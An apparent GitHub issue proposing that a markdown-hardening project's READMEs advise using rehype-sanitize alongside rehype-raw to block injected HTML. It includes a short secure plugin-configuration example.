When users combine rehype-raw (or similar plugins that allow embedded HTML) with markdown rendering pipelines, the HTML layer becomes a potential injection vector — even when using hardened markdown renderers like harden-react-markdown.

We should explicitly recommend using [rehype-sanitize](https://github.com/rehypejs/rehype-sanitize) (or equivalent sanitizers) whenever rehype-raw or similar plugins are part of the pipeline.

Why this matters

• rehype-raw parses and injects raw HTML directly into the tree — this bypasses the markdown-level URL sanitization.
• Even trusted sources (e.g., LLM-generated markdown) can contain malicious <img> or <iframe> tags that leak data or execute JS under certain integrations.
• Hardened URL sanitization (like in harden-react-markdown) only covers markdown-originated URLs, not arbitrary inline HTML.

Proposed actions

1. Update root README’s “Markdown sanitizers” section with a new subsection titled “Important: Use rehype-sanitize if using rehype-raw”.

2. Add a short warning to the individual package READMEs (harden-react-markdown, rehype-harden-urls) referencing this.

3. Optionally, provide a minimal secure example:

   import rehypeRaw from 'rehype-raw';
   import rehypeSanitize from 'rehype-sanitize';
   import { rehypeHardenUrls } from 'rehype-harden-urls';
   
   const plugins = [
     rehypeRaw,
     rehypeSanitize,
     [rehypeHardenUrls, { allowedProtocols: ['https:', 'mailto:'] }]
   ];